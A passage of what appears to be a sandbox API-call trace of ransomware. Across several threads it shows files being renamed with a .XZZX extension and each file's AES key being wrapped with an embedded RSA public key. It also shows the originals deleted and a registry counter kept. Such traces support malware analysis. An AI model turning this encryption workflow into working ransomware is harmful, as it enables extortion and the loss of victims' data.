param_1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0032.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x45afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0032.602] wsprintfW (in: param_1=0x45ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\8515860F00F2A87F630C5931054D8CC7.XZZX") returned 90 [0032.602] StrStrW (lpFirst="Winre.wim", lpSrch="XZZX") returned 0x0 [0032.602] SetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", dwFileAttributes=0x20) returned 1 [0032.603] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a4 [0032.603] CreateFileMappingW (hFile=0x3a4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3a8 [0032.603] MapViewOfFile (hFileMappingObject=0x3a8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2dc6c0) returned 0x45b0000 [0032.612] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0032.615] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0032.616] SetErrorMode (uMode=0x1) returned 0x1 [0032.616] lstrcpyW (in: lpString1=0x45ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0032.616] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ea100) returned 1 [0032.619] CryptGenKey (in: hProv=0x3ea100, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3247b8) returned 1 [0032.911] CryptExportKey (in: hKey=0x3247b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x45ae420 | out: pbData=0x0*, pdwDataLen=0x45ae420*=0x94) returned 1 [0032.911] CryptExportKey (in: hKey=0x3247b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40f0000, pdwDataLen=0x45ae420 | out: pbData=0x40f0000*, pdwDataLen=0x45ae420*=0x94) returned 1 [0032.911] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0032.911] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0032.911] CryptDestroyKey (hKey=0x3247b8) returned 1 [0032.911] CryptReleaseContext (hProv=0x3ea210, dwFlags=0x0) returned 0 [0033.105] UnmapViewOfFile (lpBaseAddress=0x45b0000) returned 1 [0033.123] CloseHandle (hObject=0x3a8) returned 1 [0033.123] SetFilePointer (in: hFile=0x3a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa160012 [0033.123] WriteFile (in: hFile=0x3a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x45ae42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x45ae42c*=0x5, lpOverlapped=0x0) returned 1 [0033.124] SetFilePointer (in: hFile=0x3a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa160017 [0033.125] WriteFile (in: hFile=0x3a4, lpBuffer=0x45af860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x45ae42c, lpOverlapped=0x0 | out: lpBuffer=0x45af860*, lpNumberOfBytesWritten=0x45ae42c*=0x12, lpOverlapped=0x0) returned 1 [0033.125] SetFilePointer (in: hFile=0x3a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa160029 [0033.125] WriteFile (in: hFile=0x3a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x45ae42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x45ae42c*=0x5, lpOverlapped=0x0) returned 1 [0033.125] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0033.125] SetErrorMode (uMode=0x1) returned 0x1 [0033.125] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0033.125] OutputDebugStringW (lpOutputString="end") [0033.125] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w", cchString=0x0, dwFlags=0x0, pbBinary=0x45adbf4, pcbBinary=0x45ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x45adbf4, pcbBinary=0x45ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0033.125] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x45adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x45ad3dc, pcbStructInfo=0x45ad3d8 | out: pvStructInfo=0x45ad3dc, pcbStructInfo=0x45ad3d8) returned 1 [0033.125] CryptAcquireContextW (in: phProv=0x45ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x45ad3e4*=0x3ea4b8) returned 1 [0033.126] CryptImportPublicKeyInfo (in: hCryptProv=0x3ea4b8, dwCertEncodingType=0x1, pInfo=0x3dd1228*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1258*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1260*, PublicKey.cUnusedBits=0x0), phKey=0x45ad3ec | out: phKey=0x45ad3ec*=0x324838) returned 1 [0033.126] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0033.126] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0033.126] CryptEncrypt (in: hKey=0x324838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x45ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x45ad3f0*=0x80) returned 1 [0033.126] CryptEncrypt (in: hKey=0x324838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ea540*, pdwDataLen=0x45ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ea540*, pdwDataLen=0x45ad3e8*=0x80) returned 1 [0033.126] OutputDebugStringW (lpOutputString="Ȇ") [0033.126] WriteFile (in: hFile=0x3a4, lpBuffer=0x3ea540*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x45ae42c, lpOverlapped=0x0 | out: lpBuffer=0x3ea540*, lpNumberOfBytesWritten=0x45ae42c*=0x80, lpOverlapped=0x0) returned 1 [0033.127] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0033.127] WriteFile (in: hFile=0x3a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x45ae42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x45ae42c*=0x5, lpOverlapped=0x0) returned 1 [0033.127] CloseHandle (hObject=0x3a4) returned 1 [0034.225] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.225] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.225] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\8515860F00F2A87F630C5931054D8CC7.XZZX" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\8515860f00f2a87f630c5931054d8cc7.xzzx"), dwFlags=0x1) returned 1 [0034.226] GetUserNameW (in: lpBuffer=0x45ae1f8, pcbBuffer=0x45adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x45adfe0) returned 1 [0034.226] wsprintfW (in: param_1=0x45adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0034.226] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x45adfe4 | out: phkResult=0x45adfe4*=0x3d8) returned 0x0 [0034.226] RegQueryValueExW (in: hKey=0x3d8, lpValueName="E1010314", lpReserved=0x0, lpType=0x45adfd8, lpData=0x45adfec, lpcbData=0x45adfdc*=0x4 | out: lpType=0x45adfd8*=0x4, lpData=0x45adfec*=0x4, lpcbData=0x45adfdc*=0x4) returned 0x0 [0034.226] RegCloseKey (hKey=0x3d8) returned 0x0 [0034.226] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x45adfe8 | out: phkResult=0x45adfe8*=0x3d8) returned 0x0 [0034.227] RegSetValueExW (in: hKey=0x3d8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x45adfec*=0x5, cbData=0x4 | out: lpData=0x45adfec*=0x5) returned 0x0 [0034.227] RegCloseKey (hKey=0x3d8) returned 0x0 Thread: id = 88 os_tid = 0x824 [0032.835] lstrcpyA (in: lpString1=0x498fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.835] lstrcpyW (in: lpString1=0x498f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0032.835] lstrcpyW (in: lpString1=0x498e860, lpString2="\\\\?\\C:\\Users\\" | out: lpString1="\\\\?\\C:\\Users\\") returned="\\\\?\\C:\\Users\\" [0032.835] SetErrorMode (uMode=0x1) returned 0x1 [0032.835] lstrcpyW (in: lpString1=0x498f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0032.835] CoCreateGuid (in: pguid=0x498e440 | out: pguid=0x498e440*(Data1=0x82b20d90, Data2=0xb8df, Data3=0x4785, Data4=([0]=0x92, [1]=0x49, [2]=0x60, [3]=0xc7, [4]=0x5a, [5]=0x56, [6]=0xf3, [7]=0x43))) returned 0x0 [0032.835] wsprintfW (in: param_1=0x498ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0032.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x498fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0032.835] wsprintfW (in: param_1=0x498e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\D2D9507033A5E4DB82B20D90383EC923.XZZX") returned 50 [0032.835] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0032.835] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\desktop.ini", dwFileAttributes=0x20) returned 1 [0032.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c0 [0032.835] ReadFile (in: hFile=0x3c0, lpBuffer=0x3e4700, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x498e418, lpOverlapped=0x0 | out: lpBuffer=0x3e4700*, lpNumberOfBytesRead=0x498e418*=0xae, lpOverlapped=0x0) returned 1 [0032.836] CloseHandle (hObject=0x3c0) returned 1 [0032.836] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4140000 [0032.838] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4150000 [0032.838] SetErrorMode (uMode=0x1) returned 0x1 [0032.838] lstrcpyW (in: lpString1=0x498e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0032.838] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ea210) returned 1 [0032.841] CryptGenKey (in: hProv=0x3ea210, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3246b8) returned 1 [0033.005] CryptExportKey (in: hKey=0x3246b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x498e41c | out: pbData=0x0*, pdwDataLen=0x498e41c*=0x94) returned 1 [0033.005] CryptExportKey (in: hKey=0x3246b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4150000, pdwDataLen=0x498e41c | out: pbData=0x4150000*, pdwDataLen=0x498e41c*=0x94) returned 1 [0033.005] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0033.006] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0033.006] CryptDestroyKey (hKey=0x3246b8) returned 1 [0033.006] CryptReleaseContext (hProv=0x3ea210, dwFlags=0x0) returned 0 [0033.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\D2D9507033A5E4DB82B20D90383EC923.XZZX" (normalized: "c:\\users\\d2d9507033a5e4db82b20d90383ec923.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0033.006] WriteFile (in: hFile=0x3d0, lpBuffer=0x3e4700*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x498e438, lpOverlapped=0x0 | out: lpBuffer=0x3e4700*, lpNumberOfBytesWritten=0x498e438*=0xae, lpOverlapped=0x0) returned 1 [0033.007] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xae [0033.007] WriteFile (in: hFile=0x3d0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x498e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x498e438*=0x5, lpOverlapped=0x0) returned 1 [0033.007] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb3 [0033.007] WriteFile (in: hFile=0x3d0, lpBuffer=0x498f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x498e438, lpOverlapped=0x0 | out: lpBuffer=0x498f860*, lpNumberOfBytesWritten=0x498e438*=0x16, lpOverlapped=0x0) returned 1 [0033.007] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc9 [0033.007] WriteFile (in: hFile=0x3d0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x498e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x498e438*=0x5, lpOverlapped=0x0) returned 1 [0033.007] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce [0033.007] SetErrorMode (uMode=0x1) returned 0x1 [0033.007] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0033.007] OutputDebugStringW (lpOutputString="end") [0033.007] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wH\"Þ\x03`Õ\x98\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x498dbf4, pcbBinary=0x498d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x498dbf4, pcbBinary=0x498d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0033.007] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x498dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x498d3dc, pcbStructInfo=0x498d3d8 | out: pvStructInfo=0x498d3dc, pcbStructInfo=0x498d3d8) returned 1 [0033.007] CryptAcquireContextW (in: phProv=0x498d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x498d3e4*=0x3ea3a8) returned 1 [0033.008] CryptImportPublicKeyInfo (in: hCryptProv=0x3ea3a8, dwCertEncodingType=0x1, pInfo=0x3dd13c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd13f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1400*, PublicKey.cUnusedBits=0x0), phKey=0x498d3ec | out: phKey=0x498d3ec*=0x3246b8) returned 1 [0033.008] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0033.008] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0033.008] CryptEncrypt (in: hKey=0x3246b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x498d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x498d3f0*=0x80) returned 1 [0033.008] CryptEncrypt (in: hKey=0x3246b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ea430*, pdwDataLen=0x498d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ea430*, pdwDataLen=0x498d3e8*=0x80) returned 1 [0033.008] WriteFile (in: hFile=0x3d0, lpBuffer=0x3ea430*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x498e438, lpOverlapped=0x0 | out: lpBuffer=0x3ea430*, lpNumberOfBytesWritten=0x498e438*=0x80, lpOverlapped=0x0) returned 1 [0033.008] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0033.008] WriteFile (in: hFile=0x3d0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x498e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x498e438*=0x5, lpOverlapped=0x0) returned 1 [0033.008] GetUserNameW (in: lpBuffer=0x498e1f8, pcbBuffer=0x498dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x498dfe0) returned 1 [0033.009] wsprintfW (in: param_1=0x498dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0033.009] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x498dfe4 | out: phkResult=0x498dfe4*=0x3d4) returned 0x0 [0033.009] RegQueryValueExW (in: hKey=0x3d4, lpValueName="E1010314", lpReserved=0x0, lpType=0x498dfd8, lpData=0x498dfec, lpcbData=0x498dfdc*=0x4 | out: lpType=0x498dfd8*=0x4, lpData=0x498dfec*=0x1, lpcbData=0x498dfdc*=0x4) returned 0x0 [0033.009] RegCloseKey (hKey=0x3d4) returned 0x0 [0033.009] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x498dfe8 | out: phkResult=0x498dfe8*=0x3d4) returned 0x0 [0033.009] RegSetValueExW (in: hKey=0x3d4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x498dfec*=0x2, cbData=0x4 | out: lpData=0x498dfec*=0x2) returned 0x0 [0033.009] RegCloseKey (hKey=0x3d4) returned 0x0 [0033.009] VirtualFree (lpAddress=0x4140000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0033.009] VirtualFree (lpAddress=0x4150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0033.010] CloseHandle (hObject=0x3d0) returned 1 [0033.010] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0033.010] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0033.010] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini")) returned 1 [0033.011] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini")) returned 0 Thread: id = 89 os_tid = 0x834 [0033.044] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0033.044] lstrcpyW (in: lpString1=0x42cf460, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0033.044] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0033.044] SetErrorMode (uMode=0x1) returned 0x1 [0033.045] lstrcpyW (in: lpString1=0x42cf860, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0033.045] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xc77f96f3, Data2=0xf4d2, Data3=0x46b7, Data4=([0]=0xa7, [1]=0x9f, [2]=0x57, [3]=0x2e, [4]=0xa6, [5]=0x8c, [6]=0x15, [7]=0x3e))) returned 0x0 [0033.045] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 44 [0033.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0033.045] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\42896F5643A06E1EC77F96F347CD5266.XZZX") returned 71 [0033.045] StrStrW (lpFirst="NTUSER.DAT", lpSrch="XZZX") returned 0x0 [0033.045] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", dwFileAttributes=0x20) returned 1 [0033.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 90 os_tid = 0x3fc [0033.193] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 